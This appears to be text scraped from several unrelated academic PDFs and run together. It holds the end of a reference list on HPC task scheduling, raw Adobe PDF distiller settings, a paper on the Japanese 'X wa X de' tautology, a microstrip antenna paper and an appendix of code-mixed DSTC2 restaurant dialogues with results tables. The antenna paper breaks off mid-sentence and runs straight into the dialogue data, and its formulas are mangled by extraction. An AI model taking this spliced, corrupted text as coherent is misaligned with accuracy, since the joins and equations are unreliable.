Distributed Systems 29(2):312–323 DOI 10.1109/tpds.2017.2755655. Thoman P, Dichev K, Heller T, Iakymchuk R, Aguilar X, Hasanov K, Gschwandtner P, Lemarinier P, Markidis S, Jordan H, Fahringer T, Katrinis K, Laure E, Nikolopoulos DS. 2018. A taxonomy of task-based parallel programming technologies for high-performance computing. Journal of Supercomputing 74(4):1422–1434 DOI 10.1007/s11227-018-2238-4. Tillenius M. 2015. Superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. SIAM Journal on Scientific Computing 37(6):C617–C642 DOI 10.1137/140989716. Topcuoglu H, Hariri S, Wu M-Y. 2002. Performance-effective and low-complexity task scheduling for heterogeneous computing. IEEE Transactions on Parallel and Distributed Systems 13(3):260–274 DOI 10.1109/71.993206. Unat D, Dubey A, Hoefler T, Shalf J, Abraham M, Bianco M, Chamberlain BL, Cledat R, Carter Edwards H, Finkel H, Fuerlinger K, Hannig F, Jeannot E, Kamil A, Keasler J, Kelly PHJ, Leung V, Ltaief H, Maruyama N, Newburn CJ, Pericas M. 2017. Trends in data locality abstractions for hpc systems. IEEE Transactions on Parallel and Distributed Systems 28(10):3007–3020 DOI 10.1109/tpds.2017.2703149. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 24/24 http://dx.doi.org/10.1109/IPDPS.2013.66 http://dx.doi.org/10.1109/tpds.2018.2851221 http://dx.doi.org/10.1145/165854.165874 http://dx.doi.org/10.1007/978-3-319-96983-1_54 http://dx.doi.org/10.1109/CLUSTR.2008.4663765 http://www2.informatik.uni-osnabrueck.de/knust/class/ http://dx.doi.org/10.1109/PDCAT.2013.40 http://dx.doi.org/10.1109/tpds.2017.2755655 http://dx.doi.org/10.1007/s11227-018-2238-4 http://dx.doi.org/10.1137/140989716 http://dx.doi.org/10.1109/71.993206 http://dx.doi.org/10.1109/tpds.2017.2703149 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ Impact study of data locality on task-based applications through the Heteroprio scheduler Introduction Background Introducing Laheteroprio Performance Study Conclusion flink6 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3ustg4gq35hhpexpxl6tm3yf5m ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 40 Semantic Analysis of the Wa Tautology in Subordinate Clauses with Minimal Independence Degree Liu Yu School of International Studies Jingdezhen Ceramic Institute Jingdezhen, China e-mail: lredfish_0@163.com Zhao Junhuai School of Foreign Language Tianjin University of Science & Technology Tianjin, China e-mail: zjh_lx2072@hotmail.com Abstract—Japanese boasts a great variety of tautological expressions, by which these tautologies fall into three categories indicated by particles, namely, ハ(pronounced wa), ガ(pronounced ga) and モ(pronounced mo). Some of which carry certain unusual semantic features when these tautologies are employed in clauses. This paper aims at analyzing the ハ (pronounced wa) tautology in subordinate clauses with minimal independence degree, and exploring the semantic properties of this category. Keywords-Tautological Expression; Dependent Clauses; Contrastive Expression; Analogical Expression; Category I. TAUTOLOGICAL EXPRESSIONS OF ハ CLASS IN SUBORDINATE CLAUSE Particle classification is used to classify Tautological expressions in this paper, which is to take particle of Tautological part as classify standard. Tautological expressions of ハ Class can be subclassified into four classes: ① ～X1 は X2(だ)1 ② X1 は X2(で)、Y1 は Y2(だ) ③ X1 は X2 でも～ ④ X1 は X2 で～ This paper focuses on Type ④ whose language form can be expressed as X1 は X2 で～[1]. For this form, the first question is which part of its Tautological expression belongs to. Type ④ is similar to Type ②, because the first half of Type ② is also the form. But these two types are completely different. The following two examples can explain their differences from three aspects. (1) 昔は昔、今は今。 (2) 冬は冬で日本海側は汽車が豪雪で立ち往生しているのに、太平洋側は空風が吹きまくる。 First, we can see that “で” of Type ② is often omitted in daily dialogue. Even if it is not omitted, we can know that 1 Ｘ 1 and Ｘ 2 refer to the same noun. The superscript is the sequence of the noun in a sentence. If the number is unnecessary, X is used to represent the noun of the Tautology part in this paper. “で” is Middleton form of Auxiliary Verb “だ”, that is, it is an Auxiliary Verb. In Example (2) which represents Type ④, there is usually no dayton after “ で ”. Seeing from the sentence meaning, it is difficult to say that this “で” is an Auxiliary Verb and it should be taken as a Case-particle. Second, seeing from the sentence structure, the front part and the back part of Type ② is called “等位節” or “並列節”, which is tied clause. However, in Type ④, Tautological part is obviously not tied clause or main clause, so it is a clause sentence. Third, from the overall translation of the sentence, they are different. Tautological expression will appear when Type ② is translated into Chinese or English, while Type ④ will not. (1a)以前(过去)是以前(过去), 现在是现在。 (1b)The past is the past, today is today. (2a)冬天日本海那边火车因大雪而无法开动，太平洋岸却猛刮干风。 (2b)When it comes to winter, trains get stuck in heavy snows along the coast of the Japan Sea when strong winds blow beside the Pacific Ocean. From the underlining parts of Chinese and English translation of Type (1), it can be seen that Type ② can be translated into Tautological expression without any problems, while Type ④ cannot. Japanese clauses classification of Minami(1974) has been improved, this paper uses the classification of Noda (1996). 従属句(独立度が一番低い)「～ながら」「～まま」 (付帯状況句)、「～て」(継起句)など強い従属節(独立度が低い)「～と」「～たら」「～ば」「～ても」時間節、連体修飾節など弱い従属節(独立度が高い)「～から」「～のに」「～し」「～けれど」「～が」など引用節(独立度が一番高い)「～と」「～って」など It can be seen from the above classification, Tautological part of Type ④ only belongs to subordinate clause (従属句) which has the lowest degree of independence. “従属句” has no definite Chinese translation. According to Japanese Linguistics, in a sentence, parts with “ながら” are called “従 mailto:redfish_0@163.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 41 属節 ” which is clause. In linguistics, there are two translations for “句” of Japanese, which are “phrase” and “clause”. Japanese grammar often uses it as the translation of the latter one, but “clause” also means “从句”. So this is a problem of unequal concept caused by the differences of languages. Considering that there is less unit than phrase or clause in Chinese, this paper takes“小句”as the translation of “従属句” (“词组” is also possible, but it is too unnatural). However, it should be noted that according to Noda(1996), in Subordinate Clause, neither “は” nor “が” can be used. From this point of view, only “X2 で” in Type ④ can be called Subordinate Clause, so the later part of Tautological express of Type ④ is in Subordinate Clause, which is different from Type ③. In Type ③, the whole Tautological expression is in Subordinate Clause. Although there is half in Subordinate Clause, Type ④ can be called “Tautological expression in Subordinate Clause”. II. FIRST RESEARCH OF TYPE ④ Like Type ③, the first research of Type ④ is less. At first, it was carried out as a custom sentence by Chen Shengbao (1986) in Advanced Japanese for Grade Three of China. Example (2) in this paper is from this book. Chen Shengbao (1986) explains Type ④ as 「冬は冬で」のように「名詞＋は＋同じ名詞＋で」という表現は、「冬は冬にふさわしい事情がある」とか、「冬は冬の問題点を持っている」などの意を表す。そして用言の場合だと、「続けば続いたで」のように、「仮定表現＋過去表現＋で」というふうに使われる。 In fact, Type ④ is a more difficult to understand for Japanese learners from China, because it is a meaningless repetition literally in the sentence as a whole for Japanese learners from China. Chen Shengbao (1986) only superficially interprets Example (2). Whether it is for the understanding of Japanese learners or for the fundamental meaning of the meaning characteristics of Type ④, it is not very inadequate. On the basis of reference of Chen Shengbao (1986), the author summarizes for Japanese learners on Type ④. ＸはＸなりの事情・状況・方法・特性などがある。「はＸ2 で」という部分を「も」に換えても意味はそれほど変わらない。 It was very important that “it can be replaced with particle “も”. It is useful for Japanese learners to understand Type ④, and it also reflects that Type ④ has the nature of contrastive sentence. The nature of being similar to contrastive sentence is proved in グループ・ジャマシイ (1998). According to グループ・ジャマシイ(1998): “「ＸはＸで」と同じ名詞を繰り返し用いて、他のものと対比しながらＸについて述べるのに用いる。”By careful observation, it can be found that Type ② (X1 は X2(で) and Y1 は Y2(だ)) is very similar to contrastive sentence in language form. But in the later discussion, it can be seen that they are not contrastive sentences. They should be called analogical sentences. The following Example (3) is a more complete example in language form. (3) 夏は夏で溶けそうだ。冬は冬で眠い。 In this example, “summer” and “winter” are a pair of antonyms. The sentence is like a comparison between summer and winter. Okamoto (1991)(1993) also gives some examples which are similar to Example (3), which takes Type ④ as the sentence with the structure of the expression of contrast. (4) 私があれほど憧れ、狙っている一流会社の一流男。昼間は昼間で社内の女どものものすごい争奪戦があり、夜は夜でホステスが鵜の目鷹の目。 (5) 平日はもういつでもものすごく混んでるし、ウィークエンドはウィークエンドでまたすごいの。 (6) 男の子は、なんてたって末が楽しみですよ。頼もしいものですよ。でも、娘は娘で可愛いものですね。両方あるのが一番ですよ。 (The sentences of the three examples were written originally in Roman letters and were translated into Japanese for the convenience in this paper.) III. THE SEMANTIC PROPERTIES OF TYPE ④ From the underlining parts of the above examples, it can be seen that there are a pair of antonyms or a pair of words which is similar to antonyms. This can be said to be a prerequisite or condition, only with this premise or condition, Type ④ can be used. Examples from グループ・ジャマシイ(1998) all have this feature. (7) 彼の言うことなど気にせず、君は君で自分が正しいと思ったことをやればいいのだ。 (8) 姉はオリンピックで金メダルを取り、妹は妹で、初めて書いた小説が芥川賞を受賞した。 (9) タヌキは若い女に化け、キツネはキツネで立派な侍に変わった。 It seems that Type ④ can be said to be an extension of Type ②. In order to better highlight this association, Example (3) can be modified. (3a)夏は夏で、冬は冬だ。 (3b)夏は溶けそうだ。冬は眠い。 As shown in (3a), if the narrative part of the latter half is removed, Example (3) will immediately become Type ②. And (3b) shows a similarity to Type ③, that is, delete one of X, the sentence meaning roughly unchanged. This indicates that if Tautological parts of Tautology of ハ Class of Japanese is not the same part of the main clause, one X can be deleted to make Japanese learners better understand its characteristics. X is only different from Type ③. Type ③ 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 42 achieves this effect by removing X1, and Type ④, by removing X2. In addition, Type ④ has an important feature that the parts of two pairs of terms X and Y do not have to be symmetrical like Example (3), which is proved by Examples (5)-(9). X and Y even do not have to appear together. For example, (10) (新しく開発されたソースをかけた料理について) 「おいしいんだろうけど、ソースはソースで食べたい。」 But even if one of X or Y does not appear, it does not mean there is no X or Y. It is potential in another form. For example, X is “料理自体” in Example (10). In other words, it can be concluded that there must be a pair of things in Type ④. According to the example of Okamoto(1991), compare it with the original sentence after deleting X2, the argument can be proved. (11) 野菜は野菜でここに置いて下さい。 (11a)野菜はここに置いて下さい。 (11a) is purely the expression of the meaning of the vegetables are here. The sentence is not about the following meanings, is there other things besides vegetables which will be put here? Should the things be put here or there? (11) is different. It has the following two meanings, such as “野菜は野菜、野菜だけのグループにする” and”その野菜だけのグループをここに置く”. In other words, (11) is to have the meaning of the distinction or classification of things, which means (11) must contain “ ほかの食材もある ”. Therefore, in (11), vegetables and other ingredients are indispensable. The follows are the most important feature of Type ④, which is also the key basis that determines that it is not contractive sentence. Back to the previous summary of a key feature of Type ②, things represented by X and Y of Type ② must have one thing in common to make this pair of things belong to the same category at a deeper level. From this critical summary and the similarity of Type ② and Type ④, it is reasonable to deduce that Type 4 also has this characteristic. The key is how to demonstrate it. After Example (5), Okamoto(1993) changed the sentence into: (12) *平日はもういつもものすごく混んでるけど、ウィークエンドはウィークエンドでわりあいすいている。2 Okamoto (1993) makes this example a complete mistake by changing the narrative part of the “またすごいの” at the end of the sentence into “わりあいすいている”, which is 2 The asterisk in front of the sentence means the sentence is completely wrong. similar to the opposite meaning of the narrative. Okamoto (1993) regards the things represented by X and Y of Type ④ as two contrastive frames, treating the narrative part of the situation as a consequence, from Example (5) and (12), it is deduced that the two frames of X and Y will bring the same consequence, and if not, “X は X で” is not applicable. This common point is not that X and Y have on literal meaning, it is the second half of the narrative part of the statement expressed. In addition to the above examples, there are more examples to support this. (13) 輝己がときどき加わる夕飯の時間も、朋子には楽しみだった。葡萄酒のことなら任せてくれ、という輝己の講釈を聞きながら、葡萄酒を飲み、食後は食後で、輝己がアルコール分を炎にして抜いてくれたブランデーを嘗めた。(津島佑子 83) (14) (権叔父に批判されて)本位田又八「やめたやめたっ。やってられっかっ。俺は俺でやっていく!!おふくろたちと一緒じゃいつまでたっても俺は又八のままだ。俺は小次郎!佐々木小次郎だっ!!」(井上雄彦(2001) 『バガボンド 11』講談社) (15) (トイレ中にアラレちゃんに吹っ飛ばされてたいへんに目にあった)則巻センベイ博士「ボクちゃんあんなハジかいたのうまれてはじめてだいっ！！こ、このまえはこのまえで地球をわってしまうし！！」 (鳥山明(1995)『Dr.スランプ 2』集英社文庫 p185) All of the examples listed above in this paper clearly show the common points between X and Y in the narrative of the second half. (2)(3)夏と冬、両方とも人間に望ましくない状況。 (4)昼間と夜、両方とも女の激しい競争対象になっている。 (5)平日とウィークエンド、両方とも混雑している状況。 (6)むすことむすめ、両方とも親にとって望ましい側面を持つ。 (7)彼と君、両方とも自分が正しいと思っている意見がある。 (8)姉と妹、両方ともある程度の成功を収めている。 (9)タヌキとキツネ、両方とも立派に人間の姿に化けることができる。 (10)料理自体と料理に使うソース、両方ともおいしい。 (11)野菜とほかの食材、両方とも食材。 (13)食事中と食後、両方ともお酒を飲んだ。 (14)佐々木小次郎を装った又八と宮本武蔵、両方とも剣道修行を進んでいる。 (15)今回とこのまえ、両方ともアラレちゃんがひどいことをした。 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 43 It can be seen, the things represented by X and Y must have a common point which is also the necessary conditions of using Type ④. However, Okamoto (1993) used the term “contrast” for X and Y, which is considered to be very inappropriate and needs to be specified. The concept of contrast (“対比表現”) is mentioned in many studies, however, there is not a clear definition. Many times it is roughly used in the following examples. (16)野菜は好きだけど、肉は嫌いだ。 (17)北海道？夏だったら行きたいけど、冬は行きたくないね。 To analyze the contrastive sentence and Tautological part of Type ④, the clauses where X and Y are must be divided into subject and narrative department. Contrastive sentence and Tautology of Type ④ have the same place that X and Y are opposite or relative. The key difference between Type 4 and contrastive sentence is the narrative part. Like (16) and (17) which are contrastive sentences, linguistic meaning of the narrative part is opposite or relative. While the narrative of Type ④ is similar, which is evident from the comparison of Examples (5) and (12). Comparison can be done of Example (10) and (17). The narrative part of the former “おいしい”and “食べたい” can be seen to have the same meaning. If someone thinks something is delicious, it means he wants to eat it. It is not the same although there is both the meaning of “going” of the narrative parts in (17). “Going” is the meaning of the fragment, not the overall significance of narrative parts. Therefore, Type ④ is fundamentally different with the general contractive sentence. It is not appropriate to call it contrastive sentence. Perhaps it can be called analogical sentence. Analogy which is carried out by the narrative part makes Type ④ have another important feature which is different from Type ②. Tautology of Type ② is a kind of stress sentence. Since the main analogical meaning parts are in narrative part, Tautology of subject part of Type ④ has no stress role. In other words, Tautological expression of Type ④ disappears. It only plays a sub-category of the subject matter of the sub-category role and the function completely disappears. Finally, there is an extremely important intermediate transitional example that fully shows the relevance of Type ④ and Type ②. (18)ワムウ「なっ！なんの真似だ！？」ジョジョ「おまえの首から出ている煙は爆発の煙ではない！……それは「波紋傷」の煙だ！先に胸や脚にくらった「波紋」はすでに全身に回っていたようだな。おめーらにとって波紋がどんなに苦しいかはよく知っている。もうなおすことはできねえが、おれの血でせめて痛みを和らげて死にな！」ジョジョ「「まさかJOJO ジョジョきさま」と驚く」ワムウ「まさかッ！JOJO ジョジョ！きさま！」ジョジョ「そうさ！ワムウ！戦いは戦いで別、シーザーの死の悲しみは悲しみで別……おれもなぜかあんたに対して敬意をはらいたくなったのさ……この血はあんたへの「敬意」なんだ……」(荒木飛呂彦(2002) 『ジョジョの奇妙な冒険 7』集英社文庫 p152) This example is almost identical in language to Type ②. Since there are other language components in Tautological part, it belongs to Type ④ from the perspective of sentence structure. It can be said that it is the intermediate transitional example of connection between the two types, which is relatively rare. IV. CONCLUSION This paper makes a general analysis and summary of the characteristics to Tautology (Type ③), where Tautological part is in clause. Several key points can be summarized as follows. 1) Tautological part appears in subordinate clauses with minimal independence degree. Only “X2 で ” is the subordinate clause. 2) Tautological part will not appear when translating into Chinese or English. 3) It is similar to the semantic properties of Type ② characteristics in some parts. There are a group of things in pairs in the whole context, representing the subject of the type. The subject matter of things can be symmetrical or asymmetric in the form of language, one of which sometimes does not appear literally. 4) Being significantly different from Type ②, its subject which is the Tautological part does no longer have the tone of emphasis, but is functional as the auxiliary role of a sub-category of the subject matter. REFERENCES [1] グループ・ジャマシイ(1998)『教師と学習者のための日本語文型辞典』くろしお出版 [2] 野田尚史(1996)『「は」と「が」』くろしお出版 [3] 南不二男(1974)『現代日本語の構造』大修館書店 [4] Chen Shengbao, Hu Guowei, Chen Huahao (1986). Japanese (5th volume of high school professional textbook of University of Japanese). Shanghai Foreign Language Education Press. [5] Zhai Dongna, Lin Hong, Pan Jun. Japanese Linguistics. 2006, Higher Education Press. [6] Okamoto, shigeko, 1991. Nominal ‘tautologies’ in Japanese: X wa X, X ga X, X mo X. Proceedings of the 17th Annual Meeting of the Berkeley Linguistics Society, 218-229 [7] Okamoto, shigeko, 1993. Nominal repetitive constructions in Japanese: The ‘tautology’ controversy revisited. Journal of Pragmatics 20: 433-466 work_3x65hc7335h7zcr2lpcmjf3t4e ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 69 The Comparison on the Side Feed Mode of Micro-strip Patch Wen Dang Department of Communication and Information Xi'an Technology University Lane 78, Yanta Road, Beilin District, Xian, China e-mail: 13637863650@163.com Xinliang Liu Department of Communication and Information Xi'an Technology University Lane 78, Yanta Road, Beilin District, Xian, China e-mail: 84829562@qq.com Abstract—The feeding of the micro-strip patch is flexible and complex, especially side feeding. In this paper, a single micro- strip patch antenna with a center frequency of 2.45GHZ is taken as an example to explore the performance of the slotted feed and non-slotted feed and verified in HFSS15.0. Combined with HFSS15.0 software simulation and theoretical calculation, the corresponding conclusions can be obtained. The theoretical value and simulation results will be shown that: the required 1/4 converter sizes of the non-slotted side feed and slotted side feed are different. By contrasting with sizes of two feeding modes, electrical size of the slotted feed is smaller. It can be known that all performances of the slotted feed are more superior. Keywords-HFSS Simulation; Micro-strip Patch; Side-feed; Slot; Matching I. INTRODUCTION Antenna is a necessary component for radiating and receiving radio waves in engineering systems such as wireless communications, radio and television, navigation, satellite, radar and other engineering systems. The micro- strip patch is simple and easy to plastic, its feeding modes are flexible and changeable. The stability of the antenna can be also affected by micro-strip patch feeding mode. The different feeding mode has different properties. The design of the feeding system determines the current distribution of the radiation patch. The more consistent the current direction is, the higher the gain is, the greater the energy is, and the better the directivity is [3]. Therefore, in an antenna system, it is especially important that how the feeding system should design, which determines the stability of the system and the quality of microwave devices. In this paper, two different side feed modes of the radiation patch are analyzed and compared. By simulating the cell structure of the micro-strip patch antenna with the center frequency f at 2.45GHZ in HFSS15.0, the corresponding sizes of the 1/4 impedance converter and intrinsic impedance are different, when the feeding position is not the same place, which has been validated in HFSS15.0. The mode following the theoretical sizes calculated by given equations is simulated in HFSS15.0. The simulation results have been drawn the followings. For the non-slotted side feed, the radiation impedance is caused by the edge impedance of the patch. The theoretical calculated 1/4 converter has a large error between the length and width values. To achieve the minimum S11 at the center frequency, it is necessary to optimize the micro-strip line parameters for several times. For the slotted side feed, the radiation impedance is produced by the edge impedance of the patch and the edge impedance of the groove. The theoretical value of the 1/4 converter has a higher accuracy. The best performance of the center frequency can be achieved by adjusting the width and depth of the slotted feeding. Based on the above conditions, the minimum value of the antenna S11 can be obtained, the smaller the reflection energy is, the greater the transmission efficiency is. II. DESIGN AND ANALYSIS OF RADIATION PATCH UNIT In this paper, the radiation patch of the center frequency f = 2.45GHZ would be used as an example, the thickness h of the substrate with Rogers5880 is 1.5mm, its dielectric constant is 2.2. According to the formula (1) – (5) [8] - [9] , it can be obtained that the width w, length L were 40mm and 48.4mm respectively, as well as the input impedance. The width w of radiation patch is the following: 2 1 2 1 2          r f c w   Where c is the speed of free space wave. Taking into account the edge shortening effect, the actual length L of the radiation patch should be expressed as: L f c L e  2 2   Where e  is the effective permittivity, L is the length of the equivalent radiation gap, they can be calculated by using the following formulas respectively. 2 1 e 121 2 1 2 1             w h rr    2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 70      8.0258.0 264.03.0 412.0 e    hw hw hL e    The input impedance can be obtained as following:    )(cos 2 2 z G zY in    Where G is the radiation conductance, β is the phase constant in the medium, and z is the distance from the feed point to the radiation patch edge. It can be concluded that the different input impedance can be obtained by selecting different feeding point positions. A. Radiation Patch Unit The length and width of the radiation patch can be calculated by formulas (1)-(4). The edge impedance of the radiation patch can be obtained by formula (5). The length and width of the 1/4 impendence converter can be known by the edge impedance. The width and length of the 50Ω intrinsic impedance can be also counted. According to the optimum sizes, the model can be built in hfss15.0 shown in Fig.1. The size of the slotted micro-strip patch can be also calculated by the same method. The optimum sizes can be obtained after many optimizations, it can be built in hfss15.0 shown in Fig.2. Figure 1. Slotted patch antenna After hfss15.0 simulation, the results are obtained in TableⅠ. The simulation results obtained by the two feeding methods are basically the same. The theoretical sizes of the slotted feed is closer to the simulated ones, even almost identical, and its electrical size is smaller. When optimizing in the way of the slotted feed, the workloads can be greatly reduced and the efficiency can be improved. B. Verification In order to verify the rationality of the above conclusions, the input port can be excited by the wave port with a 50 Ω load. when the width of the micro-strip line is w0 and the medium thickness is h, the height of the wave port is generally set to 6 ~ 10h. When there is w0>h, the width of the wave port is set to 10w0. When there is w0 bot Hello, welcome to the Cambridge restaurant system. You can ask for restaurants by area, price range or food type. How may I help you ? Hello , Cambridge restaurant system mein aapka swagat hai. Aap pa sakte hai restaurant by area, price range ya food type. Aap ko kaise help kar sakta hu main ? user im looking for a moderately priced restaurant. mein moderately priced restaurant dhund raha hoon. bot What kind of food would you like ? Aap kaunse type ka food lena chahege? user it doesnt matter. matter nahi karta. bot What part of town do you have in mind ? aapke mind me town ka kaun sa part hai ? user the south part of town. south part of town. bot api call R cuisine south moderate api call R cuisine south moderate KB Triples: pizza hut cherry hinton R post code pizza hut cherry hinton post code pizza hut cherry hinton R cuisine italian pizza hut cherry hinton R location south pizza hut cherry hinton R phone pizza hut cherry hinton phone pizza hut cherry hinton R address pizza hut cherry hinton address pizza hut cherry hinton R price moderate pizza hut cherry hinton R rating 3 restaurant alimentum R post code restaurant alimentum post code restaurant alimentum R cuisine european restaurant alimentum R location south restaurant alimentum R phone restaurant alimentum phone restaurant alimentum R address restaurant alimentum address restaurant alimentum R price moderate restaurant alimentum R rating 10 user bot restaurant alimentum is a nice restaurant in the south of town serving modern european food. restaurant alimentum ek bohot hi accha restaurant hai south town me jo modern european food serve karta hai user can i get the address ? kya mujhe address mil sakta hai bot Sure, restaurant alimentum is on restaurant alimentum address. Bilkul, restaurant alimentum restaurant alimentum address par hai user and whats the phone number for that ? aur iska phone number kya hai ? bot The phone number of restaurant alimentum is restaurant alimentum phone. restaurant alimentum ka phone number hai restaurant alimentum phone user okay, thank you, good bye. theek, thank you, good bye. bot you are welcome. welcome, alvida. Table 5: Example dialogues from the DSTC2 dataset in English and in Hindi-English code-mixed languages. The English words which are mixed in Hindi are italicized. 14 Under review as a conference paper at ICLR 2019 B. EFFECT OF USING HOPS: Dataset Model per-resp. BLEU ROUGE Entity F1 acc 1 2 L En-DSTC2 GCN-SeA+K=1 47.1 59.0 67.4 57.1 65.0 71.9 GCN-SeA+K=2 48.4 59.7 68.5 58.4 66.2 72.8 GCN-SeA+K=3 46.4 59.4 67.3 56.9 64.8 68.8 Hi-DSTC2 GCN-SeA+K=1 47.0 56.0 65.0 55.3 63.0 72.4 GCN-SeA+K=2 40.4 53.2 61.8 50.5 59.7 60.2 GCN-SeA+K=3 19.0 29.7 42.2 28.9 38.5 00.5 Be-DSTC2 GCN-SeA+K=1 47.1 58.4 67.4 57.3 64.9 69.6 GCN-SeA+K=2 41.9 55.2 64.5 53.5 61.9 61.4 GCN-SeA+K=3 07.0 25.6 34.3 16.8 25.0 02.4 GU-DSTC2 GCN-SeA+K=1 48.1 55.7 65.5 56.2 63.5 72.2 GCN-SeA+K=2 43.3 53.5 63.7 53.4 61.5 64.2 GCN-SeA+K=3 20.8 36.5 47.3 34.1 45.1 17.3 Ta-DSTC2 GCN-SeA+K=1 46.4 62.8 68.5 57.5 66.1 71.9 GCN-SeA+K=2 44.4 61.5 67.2 55.8 64.7 68.8 GCN-SeA+K=3 36.4 56.1 62.2 49.9 59.9 56.0 Table 6: GCN-SeA with multiple hops on all DSTC2 datasets C. FREQUENCY VS PPMI CO-OCCURRENCE Dataset Model per-resp. BLEU ROUGE Entity F1 acc 1 2 L En-DSTC2 GCN-SeA+Freq 50.4 61.1 69.3 59.6 67.0 76.0 GCN-SeA+PPMI 50.5 60.7 69.3 59.7 67.0 77.4 Hi-DSTC2 GCN-SeA+Freq 48.7 56.9 65.5 56.1 63.5 74.5 GCN-SeA+PPMI 49.2 57.1 66.4 56.8 64.4 75.9 Be-DSTC2 GCN-SeA+Freq 49.0 59.0 68.2 58.5 65.7 72.7 GCN-SeA+PPMI 50.3 59.2 69.0 59.4 66.6 75.1 Gu-DSTC2 